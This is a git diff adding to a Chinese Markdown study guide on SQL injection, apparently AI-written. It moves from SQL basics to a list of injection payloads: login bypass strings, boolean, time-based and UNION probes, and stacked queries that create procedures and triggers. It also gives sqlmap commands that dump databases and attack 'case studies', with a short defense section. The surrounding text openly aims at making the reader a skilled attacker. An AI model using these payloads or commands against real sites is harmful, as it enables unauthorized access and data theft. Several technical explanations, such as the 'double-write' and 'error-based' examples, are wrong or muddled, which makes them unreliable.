--- a/250601/SQL注入知识树-250602-03.md
+++ b/250601/SQL注入知识树-250602-03.md
@@ -423,3 +423,334 @@ Havij 是一个图形化的 SQL 注入工具，支持自动化扫描和利用 SQ
 - 实践：模拟成功的 SQL 注入攻击案例，如通过注入代码窃取目标网站的用户数据。
 
 通过以上详细的指令和步骤，你应该能够全面掌握 SQL 注入的技术，从基础知识到高级技术，从识别漏洞到编写攻击代码，从防御措施到实战案例，都有详细的讲解和实践指导。希望这些内容能帮助你成为一名出色的 SQL 注入攻击者！
+
+<br>
+
+<br>
+
+好的，下面是每个阶段更加详细的指令和代码示例，确保你能够全面掌握 SQL 注入的技术。
+
+### 1. 基础知识
+
+**1.1 SQL 语言基础**
+
+- **学习 SQL 的基本语法**：
+  - SELECT 语句：`SELECT column1, column2 FROM table_name;`
+  - INSERT 语句：`INSERT INTO table_name (column1, column2) VALUES (value1, value2);`
+  - UPDATE 语句：`UPDATE table_name SET column1 = value1, column2 = value2 WHERE condition;`
+  - DELETE 语句：`DELETE FROM table_name WHERE condition;`
+- **理解 SQL 的数据类型**：
+  - 整数类型：INTEGER
+  - 字符串类型：VARCHAR(n), CHAR(n)
+  - 日期类型：DATE, DATETIME
+- **熟悉 SQL 的基本操作**：
+  - 创建表：`CREATE TABLE table_name (column1 datatype, column2 datatype, ...);`
+  - 插入数据：`INSERT INTO table_name (column1, column2) VALUES (value1, value2);`
+  - 查询数据：`SELECT * FROM table_name WHERE condition;`
+  - 更新数据：`UPDATE table_name SET column1 = value1 WHERE condition;`
+  - 删除数据：`DELETE FROM table_name WHERE condition;`
+
+**1.2 数据库结构与表设计**
+
+- **学习数据库的基本结构**：
+  - 数据库：`CREATE DATABASE database_name;`
+  - 表：`CREATE TABLE table_name (column1 datatype, column2 datatype, ...);`
+  - 索引：`CREATE INDEX index_name ON table_name (column_name);`
+  - 主键：`ALTER TABLE table_name ADD PRIMARY KEY (column_name);`
+  - 外键：`ALTER TABLE table_name ADD FOREIGN KEY (column_name) REFERENCES other_table(column_name);`
+- **理解表的设计原则**：
+  - 规范化：将数据分解为多个相关表，减少数据冗余。
+  - 索引：为经常查询的列创建索引，提高查询效率。
+  - 约束：使用主键、外键、唯一约束等来保证数据的完整性和一致性。
+- **熟悉常见的 DBMS**：
+  - MySQL：`mysql -u username -p`
+  - PostgreSQL：`psql -U username -d database_name`
+  - SQL Server：`sqlcmd -S server_name -U username -P password`
+
+**1.3 常见的 SQL 查询语句**
+
+- **SELECT 语句**：
+  - 基本查询：`SELECT column1, column2 FROM table_name;`
+  - 条件查询：`SELECT * FROM table_name WHERE condition;`
+  - 排序：`SELECT * FROM table_name ORDER BY column_name ASC/DESC;`
+  - 分组：`SELECT column_name, COUNT(*) FROM table_name GROUP BY column_name;`
+  - 连接：`SELECT a.column, b.column FROM table_a a JOIN table_b b ON a.id = b.id;`
+- **INSERT 语句**：
+  - 插入单条记录：`INSERT INTO table_name (column1, column2) VALUES (value1, value2);`
+  - 插入多条记录：`INSERT INTO table_name (column1, column2) VALUES (value1, value2), (value3, value4);`
+- **UPDATE 语句**：
+  - 更新单表数据：`UPDATE table_name SET column1 = value1, column2 = value2 WHERE condition;`
+  - 更新多表数据：`UPDATE table_a a JOIN table_b b ON a.id = b.id SET a.column = value WHERE condition;`
+- **DELETE 语句**：
+  - 删除单条记录：`DELETE FROM table_name WHERE condition;`
+  - 删除多条记录：`DELETE FROM table_name WHERE column_name IN (value1, value2);`
+
+**1.4 参数化查询与动态 SQL**
+
+- **参数化查询**：
+  - Python 示例：`cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))`
+  - Java 示例：`PreparedStatement pstmt = connection.prepareStatement("SELECT * FROM users WHERE id = ?"); pstmt.setInt(1, user_id);`
+- **动态 SQL**：
+  - 直接拼接 SQL 语句：`String sql = "SELECT * FROM users WHERE id = " + user_id;`
+  - 使用占位符：`String sql = "SELECT * FROM users WHERE id = ?";`
+
+### 2. SQL 注入的基本原理
+
+**2.1 什么是 SQL 注入**
+
+- **定义**：通过在输入字段中插入恶意的 SQL 代码，操控后台数据库。
+- **示例**：输入 `' OR '1'='1` 绕过登录验证。
+
+**2.2 SQL 注入的工作原理**
+
+- **流程**：
+  1. 用户输入恶意代码。
+  2. 服务器接收输入并拼接到 SQL 语句中。
+  3. 数据库执行拼接后的 SQL 语句。
+  4. 数据库返回结果给服务器。
+  5. 服务器返回结果给用户。
+- **示例**：
+  - 输入：`admin' --`
+  - SQL 语句：`SELECT * FROM users WHERE username = 'admin' --' AND password = 'password';`
+  - 结果：绕过密码验证，直接登录。
+
+**2.3 常见的 SQL 注入类型**
+
+**2.3.1 基于错误的 SQL 注入**
+
+- **原理**：通过触发数据库错误来获取数据库结构信息。
+- **示例**：
+  - 输入：`' OR 1=1--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' OR 1=1--' AND password = 'password';`
+  - 结果：触发错误信息，观察返回的错误详情。
+
+**2.3.2 基于布尔的盲注**
+
+- **原理**：通过布尔表达式（TRUE 或 FALSE）来确定注入点的有效性。
+- **示例**：
+  - 输入：`' AND 1=1--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' AND 1=1--' AND password = 'password';`
+  - 结果：如果页面响应正常，则注入点有效。
+
+**2.3.3 基于时间的盲注**
+
+- **原理**：通过延迟响应时间来确定注入点的有效性。
+- **示例**：
+  - 输入：`' AND IF(1=1, SLEEP(5), 0)--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' AND IF(1=1, SLEEP(5), 0)--' AND password = 'password';`
+  - 结果：如果页面加载时间延长，则注入点有效。
+
+**2.3.4 UNION 基注**
+
+- **原理**：利用 UNION 操作符将多个 SELECT 语句的结果集合并。
+- **示例**：
+  - 输入：`' UNION SELECT 1,2,3--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' UNION SELECT 1,2,3--' AND password = 'password';`
+  - 结果：返回额外的数据行。
+
+**2.3.5 二阶段 SQL 注入**
+
+- **原理**：首先注入一个恶意的 SQL 语句，然后在第二阶段执行该语句。
+- **示例**：
+  - 第一阶段：输入 `'; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END;--`
+  - 第二阶段：输入 `'; CALL p();--`
+  - 结果：执行存储过程，返回用户数据。
+
+### 3. 识别 SQL 注入漏洞
+
+**3.1 手动测试方法**
+
+- **步骤**：
+  1. 选择一个输入字段。
+  2. 输入特殊字符，如单引号、双引号、分号等。
+  3. 观察应用程序的响应。
+- **示例**：
+  - 输入：`' OR '1'='1`
+  - 结果：如果能够绕过身份验证，则存在 SQL 注入漏洞。
+
+**3.2 自动化工具**
+
+- **常见工具**：
+  - Sqlmap：`sqlmap -u "http://example.com/vulnerable.php?id=1" --dbs`
+  - Burp Suite：拦截请求，手动修改参数值，观察响应。
+  - Havij：图形化界面，自动扫描和利用 SQL 注入漏洞。
+
+**3.3 常见的漏洞点**
+
+**3.3.1 登录表单**
+
+- **示例**：
+  - 输入：`admin' --`
+  - 结果：绕过密码验证，直接登录。
+
+**3.3.2 搜索功能**
+
+- **示例**：
+  - 输入：`' OR '1'='1`
+  - 结果：返回所有记录，表明存在 SQL 注入漏洞。
+
+**3.3.3 评论系统**
+
+- **示例**：
+  - 输入：`' OR '1'='1`
+  - 结果：如果评论内容包含在数据库查询中，则可能返回所有评论。
+
+**3.3.4 URL 参数**
+
+- **示例**：
+  - 原始 URL：`http://example.com/product.php?id=1`
+  - 修改后 URL：`http://example.com/product.php?id=1' OR '1'='1`
+  - 结果：如果返回所有产品信息，则存在 SQL 注入漏洞。
+
+### 4. 编写 SQL 注入攻击代码
+
+**4.1 基本的 SQL 注入语句**
+
+- **示例**：
+  - `' OR '1'='1`
+  - `admin' --`
+  - `' AND 1=1--`
+  - `' AND IF(1=1, SLEEP(5), 0)--`
+  - `' UNION SELECT 1,2,3--`
+
+**4.2 编写注入代码**
+
+**4.2.1 基于错误的注入**
+
+- **示例**：
+  - 输入：`' OR 1=1--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' OR 1=1--' AND password = 'password';`
+  - 结果：触发错误信息，观察返回的错误详情。
+
+**4.2.2 基于布尔的盲注**
+
+- **示例**：
+  - 输入：`' AND 1=1--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' AND 1=1--' AND password = 'password';`
+  - 结果：如果页面响应正常，则注入点有效。
+
+**4.2.3 基于时间的盲注**
+
+- **示例**：
+  - 输入：`' AND IF(1=1, SLEEP(5), 0)--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' AND IF(1=1, SLEEP(5), 0)--' AND password = 'password';`
+  - 结果：如果页面加载时间延长，则注入点有效。
+
+**4.2.4 UNION 基注**
+
+- **示例**：
+  - 输入：`' UNION SELECT 1,2,3--`
+  - SQL 语句：`SELECT * FROM users WHERE username = '' UNION SELECT 1,2,3--' AND password = 'password';`
+  - 结果：返回额外的数据行。
+
+**4.2.5 二阶段 SQL 注入**
+
+- **示例**：
+  - 第一阶段：输入 `'; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END;--`
+  - 第二阶段：输入 `'; CALL p();--`
+  - 结果：执行存储过程，返回用户数据。
+
+### 5. 高级 SQL 注入技术
+
+**5.1 双写注入**
+
+- **原理**：通过双写技术绕过输入过滤。
+- **示例**：
+  - 输入：`(SELECT * FROM (SELECT * FROM users)a)--`
+  - 结果：绕过输入过滤，注入成功。
+
+**5.2 条件注入**
+
+- **原理**：通过条件语句来注入代码。
+- **示例**：
+  - 输入：`' AND (SELECT COUNT(*) FROM users) > 1--`
+  - 结果：如果页面响应正常，则注入点有效。
+
+**5.3 子查询注入**
+
+- **原理**：通过子查询来注入代码。
+- **示例**：
+  - 输入：`'; SELECT * FROM users--`
+  - 结果：执行子查询，返回用户数据。
+
+**5.4 存储过程注入**
+
+- **原理**：通过注入存储过程来实现攻击。
+- **示例**：
+  - 输入：`'; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END; CALL p();--`
+  - 结果：创建并执行存储过程，返回用户数据。
+
+**5.5 触发器注入**
+
+- **原理**：通过注入触发器来实现攻击。
+- **示例**：
+  - 输入：`'; CREATE TRIGGER t BEFORE INSERT ON users FOR EACH ROW BEGIN SELECT * FROM users; END;--`
+  - 结果：创建触发器，在插入操作前执行 SELECT 语句。
+
+### 6. 防御 SQL 注入
+
+**6.1 使用参数化查询**
+
+- **示例**：
+  - Python：`cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))`
+  - Java：`PreparedStatement pstmt = connection.prepareStatement("SELECT * FROM users WHERE id = ?"); pstmt.setInt(1, user_id);`
+
+**6.2 使用准备好的语句**
+
+- **示例**：
+  - Java：`PreparedStatement pstmt = connection.prepareStatement("SELECT * FROM users WHERE id = ?"); pstmt.setInt(1, user_id);`
+
+**6.3 输入验证与过滤**
+
+- **示例**：
+  - Python：`import re user_input = re.sub(r'[^a-zA-Z0-9]', '', user_input)`
+  - JavaScript：`userInput.replace(/[^a-zA-Z0-9]/g, '');`
+
+**6.4 使用安全的编程习惯**
+
+- **示例**：
+  - 避免直接拼接 SQL 语句：`String sql = "SELECT * FROM users WHERE id = " + user_id;`
+  - 使用 ORM 框架：`User user = session.createQuery("FROM User WHERE id = :id").setParameter("id", user_id).uniqueResult();`
+
+**6.5 定期更新和补丁**
+
+- **示例**：
+  - 定期检查和更新数据库和应用程序，如定期更新 MySQL 数据库和相关的应用程序。
+
+### 7. 实战案例与工具
+
+**7.1 常见的 SQL 注入工具**
+
+**7.1.1 Sqlmap**
+
+- **基本用法**：
+  - 扫描目标网站：`sqlmap -u "http://example.com/vulnerable.php?id=1" --dbs`
+  - 自动化注入：`sqlmap -u "http://example.com/vulnerable.php?id=1" --dump`
+
+**7.1.2 Burp Suite**
+
+- **基本用法**：
+  - 拦截请求：在 Burp Suite 中启动拦截器，拦截目标网站的请求。
+  - 手动测试：修改请求参数，观察响应。
+
+**7.1.3 Havij**
+
+- **基本用法**：
+  - 扫描目标网站：在 Havij 中输入目标 URL，开始扫描。
+  - 自动化注入：Havij 会自动检测并利用 SQL 注入漏洞。
+
+**7.2 实战案例分析**
+
+**7.2.1 实际网站的 SQL 注入漏洞**
+
+- **示例**：
+  - 目标网站：`http://example.com/login.php`
+  - 输入：`admin' --`
+  - 结果：绕过密码验证，直接登录。
+
+**7.2.2 成功的 SQL 注入攻击案例**
+
+- **示例**：
+  - 目标网站：`http://example.com/search.php?q=`
+  - 输入：`' OR '1'='1`
+  - 结果：返回所有
